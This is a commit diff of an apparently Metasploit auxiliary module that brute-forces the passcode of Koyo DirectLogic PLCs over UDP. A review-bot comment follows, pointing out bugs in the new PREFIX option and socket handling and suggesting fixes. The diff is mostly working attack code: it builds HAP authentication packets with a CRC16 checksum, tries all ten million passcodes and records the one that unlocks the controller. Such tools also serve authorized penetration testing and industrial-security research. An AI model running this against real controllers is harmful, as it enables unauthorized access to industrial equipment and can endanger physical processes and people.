Fix up koyo login
This commit is contained in:
parent
246ebca940
commit
2c473e3cdd
|
@ -21,9 +21,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Name' => 'Koyo DirectLogic PLC Password Brute Force Utility',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
This module attempts to authenticate to
|
||||
a locked Koyo DirectLogic PLC. The PLC uses a restrictive
|
||||
passcode, which can be A0000000 through A9999999.
|
||||
This module attempts to authenticate to a locked Koyo DirectLogic PLC.
|
||||
The PLC uses a restrictive passcode, which can be A0000000 through A9999999.
|
||||
The "A" prefix can also be changed by the administrator to any other character,
|
||||
which can be set through the PREFIX option of this module.
|
||||
|
||||
This module is based on the original 'koyobrute.rb' Basecamp module from
|
||||
DigitalBond.
|
||||
|
@ -43,12 +44,13 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptAddress.new('LHOST', [false, "The local IP address to bind to"]),
|
||||
OptInt.new('RECV_TIMEOUT', [false, "Time (in seconds) to wait between packets", 3]),
|
||||
OptString.new('PREFIX', [true, 'The prefix to use for the password (default: A)', "A"]),
|
||||
Opt::RPORT(28784)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
@CCITT_16 = [
|
||||
@@CCITT_16 = [
|
||||
0x0000, 0x1021, 0x2042, 0x3063, 0x4084, 0x50A5, 0x60C6, 0x70E7,
|
||||
0x8108, 0x9129, 0xA14A, 0xB16B, 0xC18C, 0xD1AD, 0xE1CE, 0xF1EF,
|
||||
0x1231, 0x0210, 0x3273, 0x2252, 0x52B5, 0x4294, 0x72F7, 0x62D6,
|
||||
|
@ -82,41 +84,42 @@ class Metasploit3 < Msf::Auxiliary
|
|||
0xEF1F, 0xFF3E, 0xCF5D, 0xDF7C, 0xAF9B, 0xBFBA, 0x8FD9, 0x9FF8,
|
||||
0x6E17, 0x7E36, 0x4E55, 0x5E74, 0x2E93, 0x3EB2, 0x0ED1, 0x1EF0
|
||||
]
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
@udp_sock ||= {}
|
||||
@udp_sock[ip] = Rex::Socket::Udp.create(
|
||||
'LocalHost' => datastore['LHOST'] || nil,
|
||||
'PeerHost' => ip,
|
||||
'PeerPort' => rport,
|
||||
|
||||
# Create a socket in order to receive responses from a non-default IP
|
||||
@udp_sock = Rex::Socket::Udp.create(
|
||||
'PeerHost' => rhost,
|
||||
'PeerPort' => rport.to_i,
|
||||
'Context' => {'Msf' => framework, 'MsfExploit' => self}
|
||||
)
|
||||
print_status("#{ip}:#{rport} - KOYO - Checking the controller for locked memory...")
|
||||
if unlock_check(ip)
|
||||
print_good("#{ip}:#{rport} - Unlocked!")
|
||||
add_socket(@udp_sock)
|
||||
|
||||
print_status("#{rhost}:#{rport} - KOYO - Checking the controller for locked memory...")
|
||||
|
||||
if unlock_check
|
||||
# TODO: Report a vulnerability for an unlocked controller?
|
||||
print_good("#{rhost}:#{rport} - Unlocked!")
|
||||
return
|
||||
else
|
||||
print_status("#{ip}:#{rport} - KOYO - Controller locked; commencing bruteforce...")
|
||||
print_status("#{rhost}:#{rport} - KOYO - Controller locked; commencing bruteforce...")
|
||||
end
|
||||
|
||||
# TODO: Consider sort_by {rand} in order to avoid sequential guessing
|
||||
# or something fancier
|
||||
|
||||
(0..9999999).each do |i|
|
||||
|
||||
passcode = 'A' + i.to_s.rjust(7,'0')
|
||||
vprint_status("#{ip}:#{rport} - KOYO - Trying #{passcode}")
|
||||
|
||||
passcode = datastore['PREFIX'] + i.to_s.rjust(7,'0')
|
||||
vprint_status("#{rhost}:#{rport} - KOYO - Trying #{passcode}")
|
||||
bytes = passcode.scan(/../).map { |x| x.to_i(16) }
|
||||
passstr = bytes.pack("c*")
|
||||
print_debug passstr.inspect
|
||||
passstr = bytes.pack("C*")
|
||||
res = try_auth(passstr)
|
||||
next if not res
|
||||
|
||||
res = try_auth(ip, passstr)
|
||||
if res
|
||||
print_good "#{ip}:#{rport} - KOYO - Found passcode: #{passcode}"
|
||||
print_good "#{rhost}:#{rport} - KOYO - Found passcode: #{passcode}"
|
||||
report_auth_info(
|
||||
:host => ip,
|
||||
:port => rport,
|
||||
:host => rhost,
|
||||
:port => rport.to_i,
|
||||
:proto => 'udp',
|
||||
:user => '',
|
||||
:pass => passcode, # NOTE: Human readable
|
||||
|
@ -124,17 +127,17 @@ class Metasploit3 < Msf::Auxiliary
|
|||
)
|
||||
break
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def crc16(buf, crc=0)
|
||||
buf.each_byte{|x| crc = ((crc<<8) ^ @CCITT_16[(crc>>8) ^ x])&0xffff}
|
||||
[crc].pack("S")
|
||||
buf.each_byte{|x| crc = ((crc << 8) ^ @@CCITT_16[( crc >> 8) ^ x]) & 0xffff }
|
||||
[crc].pack("n")
|
||||
end
|
||||
|
||||
def unlock_check(ip)
|
||||
def unlock_check
|
||||
checkpacket = "HAP\xe6\x01\x6e\x68\x0d\x00\x1a\x00\x09\x00\x01\x50\x01\x02\x00\x01\x00\x17\x52"
|
||||
@udp_sock[ip].sendto(checkpacket, ip, datastore['RPORT'].to_i)
|
||||
@udp_sock.sendto(checkpacket, rhost, rport.to_i)
|
||||
|
||||
recvpacks = 0
|
||||
# TODO: Since the packet count is critical, consider using Capture instead,
|
||||
|
@ -144,10 +147,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
#
|
||||
# Another way to speed things up is to use fancy threading, but that's for another
|
||||
# day.
|
||||
while (r = @udp_sock[ip].recvfrom(65535, 0.1) and recvpacks < 2)
|
||||
while (r = @udp_sock.recvfrom(65535, 0.1) and recvpacks < 2)
|
||||
res = r[0]
|
||||
if res.length == 269 # auth reply packet
|
||||
if res[17] == "\x00" and res[19] == "\xD2" # Magic bytes
|
||||
if res[17,1] == "\x00" and res[19,1] == "\xD2" # Magic bytes
|
||||
return true
|
||||
end
|
||||
end
|
||||
|
@ -156,19 +159,19 @@ class Metasploit3 < Msf::Auxiliary
|
|||
return false
|
||||
end
|
||||
|
||||
def try_auth(ip, passstr)
|
||||
def try_auth(passstr)
|
||||
data = "\x1a\x00\x0d\x00\x01\x51\x01\x19\x02\x04\x00" + passstr + "\x17\xaf"
|
||||
header = "HAP"
|
||||
header += "\xe5\x01" # random session ID
|
||||
header += crc16(data)
|
||||
header += [data.length].pack("S")
|
||||
header += [data.length].pack("n")
|
||||
authpacket = header + data
|
||||
|
||||
@udp_sock[ip].sendto(authpacket, ip, datastore['RPORT'].to_i, 0)
|
||||
@udp_sock.sendto(authpacket, rhost, rport.to_i)
|
||||
|
||||
2.times { @udp_sock[ip].get(recv_timeout) } # talk to the hand
|
||||
2.times { @udp_sock.get(recv_timeout) } # talk to the hand
|
||||
|
||||
status = unlock_check(ip)
|
||||
status = unlock_check
|
||||
|
||||
return status
|
||||
end
|
||||
|
@ -180,9 +183,4 @@ class Metasploit3 < Msf::Auxiliary
|
|||
datastore['RECV_TIMEOUT'].to_i.abs
|
||||
end
|
||||
end
|
||||
|
||||
def cleanup
|
||||
@udp_sock.each_pair { |ip,sock| sock.shutdown rescue nil}
|
||||
end
|
||||
|
||||
end
|
||||
|
|
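Review bot: The new `passcode = datastore['PREFIX'] + i.to_s.rjust(7,'0')` is fed straight into `passcode.scan(/../).map { |x| x.to_i(16) }`, so PREFIX is only valid as a single hex digit: `'G0'.to_i(16)` is `0` with no error, a two-character prefix makes the nine-character string lose its last digit to `scan(/../)`, and a longer one changes the length of the data field, so every guess is silently wrong while the module reports nothing. Validate the option once before the loop, e.g. `raise Msf::OptionValidateError.new(['PREFIX']) unless datastore['PREFIX'].to_s =~ /\A[0-9A-Fa-f]\z/`, and reword the description's "any other character" to "any other hex digit". The `'LocalHost' => datastore['LHOST']` argument was dropped from `Rex::Socket::Udp.create` while the LHOST option is still registered, so that option is now dead even though the new comment says the socket exists to receive replies for a non-default IP; either pass it again or remove the option. The magic-byte test `res[19,1] == "\xD2"` compares a binary response byte against a source-literal, which is false under a UTF-8 source encoding and only works if the file carries a `# -*- coding: binary -*-` magic comment (not visible in these hunks), so that is worth confirming.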